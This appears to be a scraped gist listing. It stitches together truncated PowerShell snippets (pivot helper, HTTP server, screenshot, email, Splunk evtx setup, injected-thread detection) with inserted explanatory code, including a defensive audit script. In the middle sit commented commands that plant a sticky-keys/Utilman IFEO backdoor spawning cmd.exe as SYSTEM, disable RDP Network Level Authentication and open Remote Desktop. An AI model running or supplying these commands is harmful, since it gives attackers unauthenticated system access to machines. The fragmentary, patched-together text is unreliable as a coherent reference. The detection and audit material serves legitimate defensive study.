This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Rotates a vertical set similar to an Excel PivotTable
#
# Given $data in the format:
#
# Category      Activity      Duration
# ------------  ------------  --------
# Management    Email         1
# Management    Slides        4
# Project A     Email         2
# Project A     Research      1
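An added implementation of the rotation the header above describes. It is not the gist's own function (which is cut off here): the four input rows are constructed from the sample table, and the function name ConvertTo-PivotTable and its parameter names are mine. Each distinct Activity becomes a column, each Category a row, and Duration is summed into the cell; categories that never performed an activity get 0 rather than a missing property.

```powershell
# Added example (not the gist's code): pivot a vertical set the way the header describes.
# Input rows are constructed from the sample table in the gist header.
$data = @(
    [pscustomobject]@{ Category = 'Management'; Activity = 'Email';    Duration = 1 }
    [pscustomobject]@{ Category = 'Management'; Activity = 'Slides';   Duration = 4 }
    [pscustomobject]@{ Category = 'Project A';  Activity = 'Email';    Duration = 2 }
    [pscustomobject]@{ Category = 'Project A';  Activity = 'Research'; Duration = 1 }
)

function ConvertTo-PivotTable {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [psobject[]] $InputObject,
        [Parameter(Mandatory)] [string] $RowProperty,     # property whose values become rows
        [Parameter(Mandatory)] [string] $ColumnProperty,  # property whose values become columns
        [Parameter(Mandatory)] [string] $ValueProperty    # numeric property summed into each cell
    )
    begin { $rows = [System.Collections.Generic.List[psobject]]::new() }
    process { foreach ($o in $InputObject) { $rows.Add($o) } }
    end {
        # The column set is the distinct values of the pivoted property, sorted for a stable layout.
        $columns = $rows | ForEach-Object { $_.$ColumnProperty } | Sort-Object -Unique

        $rows | Group-Object -Property $RowProperty | ForEach-Object {
            # Start every row with all columns at 0 so the output is rectangular.
            $out = [ordered]@{ $RowProperty = $_.Name }
            foreach ($c in $columns) { $out[$c] = 0 }
            # Accumulate the value for each (row, column) pair.
            foreach ($r in $_.Group) { $out[$r.$ColumnProperty] += $r.$ValueProperty }
            [pscustomobject]$out
        }
    }
}

$data |
    ConvertTo-PivotTable -RowProperty Category -ColumnProperty Activity -ValueProperty Duration |
    Format-Table -AutoSize
```

With the sample rows this prints a row per Category with Email, Research and Slides columns (Management: 1, 0, 4; Project A: 2, 1, 0). Because the output property names are taken from the data, a column value that collides with the row property name (an Activity literally named "Category") would overwrite it; validate the input if the column values are untrusted.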
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]
    $ComputerName,

    [int]
    $Port = 443
)
<#
.SYNOPSIS
    Start a web server that will route requests to a series of script blocks as defined by the -Routes parameter.
.DESCRIPTION
    Starts a single-threaded web server and responds to requests by executing the script blocks that are
    defined as routes on the command line.
.NOTES
    Copyright 2013 Chris Duck
function Get-ScreenShot
{
    [CmdletBinding()]
    param(
        [parameter(Position = 0, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)]
        [ValidateNotNullOrEmpty()]
        [string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot",

        #screenshot_[yyyyMMdd_HHmmss_ffff].png
        [parameter(Position = 1, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)]
Function Send-EMailMessage {
    [CmdletBinding()]
    param(
        [Parameter(Position=1, Mandatory=$true)]
        [String[]]
        $To,

        [Parameter(Position=2, Mandatory=$false)]
        [String[]]
        $CcRecipients,
1. Parse evtx logs with evtxdump.py (https://github.com/williballenthin/python-evtx)
2. Create custom Splunk sourcetype "winevtx":
   Edit $SPLUNK_HOME/etc/system/local/props.conf

   [winevtx]
   NO_BINARY_CHECK = 1
   SHOULD_LINEMERGE = true
   BREAK_ONLY_BEFORE = ^\<Event xmlns=
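An added check, not part of the gist, for confirming before ingestion that the BREAK_ONLY_BEFORE rule above yields one record per event: it applies the same line-anchored boundary to evtxdump.py-style output and parses each piece as XML. The two events in $sample are constructed by hand in the shape python-evtx emits (a namespaced Event root, pretty-printed); the host name, user and timestamps are invented, and the function name Split-EvtxDump is mine.

```powershell
# Added example (not from the gist): split evtxdump.py output on the same boundary
# Splunk will use and pull out the fields an analyst searches on first.
# $sample is constructed test data, not output from a real log.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID Qualifiers="">4624</EventID>
    <TimeCreated SystemTime="2013-05-01 10:15:22.123456" />
    <Computer>WS01.corp.example</Computer>
  </System>
  <EventData>
    <Data Name="TargetUserName">alice</Data>
    <Data Name="LogonType">10</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID Qualifiers="">4672</EventID>
    <TimeCreated SystemTime="2013-05-01 10:15:22.130000" />
    <Computer>WS01.corp.example</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">alice</Data>
  </EventData>
</Event>
'@

function Split-EvtxDump {
    [CmdletBinding()]
    param([Parameter(Mandatory)] [string] $Text)

    # Same boundary as props.conf BREAK_ONLY_BEFORE: a line that starts with "<Event xmlns=".
    # (?m) makes ^ match at every line start; the lookahead keeps the tag in the record.
    $records = [regex]::Split($Text, '(?m)^(?=<Event xmlns=)')

    $records | Where-Object { $_.Trim() } | ForEach-Object {
        $x = [xml]$_
        $sys = $x.Event.System
        # EventID carries a Qualifiers attribute, so it is an element rather than a bare string.
        $idNode = $sys.EventID
        $id = if ($idNode -is [System.Xml.XmlElement]) { $idNode.InnerText } else { [string]$idNode }
        [pscustomobject]@{
            EventID     = [int]$id
            TimeCreated = $sys.TimeCreated.SystemTime
            Computer    = $sys.Computer
            # Flatten EventData into name=value pairs; GetAttribute avoids the XmlElement.Name property.
            Data        = ($x.Event.EventData.Data |
                            ForEach-Object { '{0}={1}' -f $_.GetAttribute('Name'), $_.InnerText }) -join ';'
        }
    }
}

$events = Split-EvtxDump -Text $sample
$events | Format-Table -AutoSize
# Two records are expected here. If the split produces a different count on real dump output
# (for example because the tool wraps the root element), the Splunk rule needs the same adjustment.
```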
<#
.Synopsis
    Registers an HTTP prefix and listens for an HttpRequest
.DESCRIPTION
    Simple PowerShell HTTP Server implementation to respond to a single HTTP request
.EXAMPLE
    Get-HttpRequest -UriPrefix "http://+:80/TestUri/" -ResponseData (Get-Content C:\inetpub\wwwroot\index.html)
.EXAMPLE
    Get-HttpRequest -UriPrefix "http://127.0.0.1/" -ResponseData "It Works...!" -ShowRequest
#>
REM Register cmd.exe as the IFEO "Debugger" for the accessibility binaries. Triggering Sticky Keys,
REM Utilman or DisplaySwitch at the logon screen then spawns cmd.exe as SYSTEM without a logon.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REM Disable Network Level Authentication so the logon screen is reachable over RDP before any credential is supplied.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
REM Open the Remote Desktop firewall rules (legacy "netsh firewall" context and its advfirewall equivalent) and start the service.
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
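An added audit script, written here as the defensive counterpart to the commands above and not part of the gist: it reads back every setting those commands write (IFEO Debugger values on the accessibility binaries, the RDP-Tcp NLA flag, the TermService state) and reports anything that matches the backdoored configuration. The list of accessibility binaries is mine and extends the three the gist targets to the other logon-screen tools that are commonly hijacked the same way; the function names are assumptions.

```powershell
# Added example (not the gist's code): audit the persistence points the commands above modify.
# Run elevated so HKLM is readable in full. Registry paths are the ones the gist writes.
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$TsKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RdpKey   = Join-Path $TsKey 'WinStations\RDP-Tcp'

# Assumed list: the three binaries from the gist plus other logon-screen accessibility tools.
$AccessibilityBinaries = 'sethc.exe', 'Utilman.exe', 'DisplaySwitch.exe',
                         'osk.exe', 'Narrator.exe', 'Magnify.exe', 'AtBroker.exe'

function Get-IfeoDebuggerHijack {
    [CmdletBinding()]
    param([string[]] $Binaries = $AccessibilityBinaries)

    foreach ($bin in $Binaries) {
        $key = Join-Path $IfeoRoot $bin            # registry key names are case-insensitive
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $dbg = (Get-ItemProperty -LiteralPath $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            # Any Debugger value on these binaries is suspect; a legitimate debugger is vanishingly rare here.
            [pscustomobject]@{ Binary = $bin; Debugger = $dbg; Key = $key }
        }
    }
}

function Get-RdpExposure {
    [CmdletBinding()]
    param()
    $nla  = (Get-ItemProperty -LiteralPath $RdpKey -Name UserAuthentication  -ErrorAction SilentlyContinue).UserAuthentication
    $deny = (Get-ItemProperty -LiteralPath $TsKey  -Name fDenyTSConnections  -ErrorAction SilentlyContinue).fDenyTSConnections
    $svc  = Get-Service -Name TermService -ErrorAction SilentlyContinue
    [pscustomobject]@{
        NlaRequired        = ($nla -eq 1)       # the gist sets this to 0
        RdpConnectionsDenied = ($deny -ne 0)    # 1 (default on workstations) still blocks RDP even with TermService running
        TermServiceStatus  = if ($svc) { $svc.Status } else { 'NotFound' }
    }
}

$hits = Get-IfeoDebuggerHijack
if ($hits) {
    Write-Warning 'IFEO Debugger hijack present on accessibility binaries:'
    $hits | Format-Table -AutoSize
} else {
    'No IFEO Debugger values on accessibility binaries.'
}
Get-RdpExposure | Format-List

# Remediation for a confirmed hit (run deliberately, not as part of the audit):
#   Remove-ItemProperty -LiteralPath (Join-Path $IfeoRoot 'sethc.exe') -Name Debugger
#   Set-ItemProperty    -LiteralPath $RdpKey -Name UserAuthentication -Value 1
```

Note that the commands above never clear fDenyTSConnections, so on a host where Remote Desktop was off they open the firewall and start TermService without actually making RDP accept connections; the audit reports that flag separately so the two cases are not confused.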
Function Send-EWSEmail
{
<#
.SYNOPSIS
    Sends email via Exchange Web Services
.DESCRIPTION
    Must be run with parameters
.PARAMETER Username
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |